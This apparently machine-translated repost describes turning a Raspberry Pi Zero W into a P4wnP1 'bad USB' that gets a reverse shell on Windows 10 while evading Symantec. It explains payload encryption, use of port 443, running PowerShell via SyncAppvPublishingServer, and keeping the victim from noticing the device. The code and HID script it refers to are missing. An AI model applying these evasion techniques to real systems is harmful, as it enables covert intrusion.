Shulou(Shulou.com)06/02 Report--

This article shows you the example analysis of P4wnP1 USB and Symantec anti-virus bypass, the content is concise and easy to understand, it will definitely brighten your eyes. I hope you can get something through the detailed introduction of this article.

Recently, I used P4wnP1 image to convert my Raspberry Pi Zero W into a bad USB. My ultimate goal is to run the remote command shell while bypassing the latest version of Symantec SEP with CompleteCare enabled. I can easily run remote shell by creating my own payload payload, but it is difficult to execute because of the advanced features of SONAR and IPS detection provided by Symantec. To solve this problem, all you have to do is encrypt the payload, because Symantec will not be able to analyze it.

Before we officially begin this article, I suggest you read the following articles about anti-virus bypass:

Http://niiconsulting.com/checkmate/2018/06/bypassing-detection-for-a-reverse-meterpreter-shell/

Https://gbhackers.com/malicious-payload-evasion-techniques/

Https://www.shellterproject.com/

Experimental environment and equipment requirements:

Raspberry Pi Zero W and SD Card

Pi Zero W USB An addon (https://www.amazon.com/MakerFocus-Raspberry-Required-Provide-Connector/dp/B077W69CD1 and http://www.raspberrypiwiki.com/index.php/Raspberry_Pi_Zero_W_USB-A_Addon_Board)

For the laptop used for the attack, the attack plane IP in this article is 192.168.1.106.

Windows 10 machines with Symantec SEP CompleteCare enabled

Set up P4wnP1

I won't explain the setting of P4wnP1 USB here, because several articles have covered it in detail. You can refer to the official git https://github.com/mame82/P4wnP1_aloa and WIKI https://p4wnp1.readthedocs.io/en/latest/.

For some considerations of the settings, I changed the following important settings:

Hotspot name

USB HID attack script

Some pictures of the final device.

Victim machine

My test machine runs trial versions of Windows 10.0.16299.125 and Symantec Endpoint Protection 14.2.

I also need to make sure that UAC is enabled by default.

Attack aircraft

I use my customized Ubuntu machine for penetration testing. One warning of the test is that I can only connect on the same network. You can hide your connections and outbound through ports such as 443, which is usually allowed on corporate networks with little filtering.

Attack our target, Payload.

Obfuscation technology plays an important role in avoiding payload detection. I like to use c # or c to create my own payload. Here is a wonderful article on this area, you can refer to https://medium.com/@Bank_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15. For this particular example, I used a simple c # payload, the source code hosted and created by the above author in github.

Here I would like to remind you to make some minor changes to the IP and port of the attack plane. I will use port 443 for testing.

I ran a test case on the victim's machine and I was surprised that Symantec didn't detect it.

Payload Delivery

It is not easy to transfer payload. Symantec's SONAR closely monitors powershell and the command prompt and seems to detect all my actions.

I tried to use certutil to provide payload from a website hosted on my local network server. Another way is to decode the payload to base64 and use certutil to decode it. But it all failed.

In the end, I used a very simple technique to execute the code through the running SyncAppvPublishingServer. You can find a detailed description of this technology and similar technologies here. It also allowed me to completely evade Symantec's surveillance of powershell.

Transfer payload I used a simple command to download payload through the powershell that has evaded detection, and the custom payload can also evade detection. After download, the file will be run from the user's configuration file. Let's turn our attention to the following code.

Get shell

To complete the attack, I set up bad USB to execute the command. Here are some pictures from my settings. I connected to my Android phone through WiFi and visited my bad USB. Symantec didn't detect it because it wasn't a USB device, it was used as a keyboard.

The HID script is set to wait for the user to press the Numlock key repeatedly, and you can modify it according to your personal preferences when and how to execute it. Be careful! The USB HID device will be displayed on the screen, and you have to make sure that users don't find it or suspect it.

The HID script I set up is as follows:

After execution, I got a remote shell.

Update-  other AV solutions

Based on the feedback, I tried to test some other solutions.

So far, Windows Defender has a very strong ability to detect attacks, as shown below.

Windows Defender

Symantec

Plan for the future

Using c-based persistent payload transport

Modify HID to make it more covert

The above is the example analysis of P4wnP1 USB and Symantec antivirus bypass. Have you learned the knowledge or skills? If you want to learn more skills or enrich your knowledge reserve, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.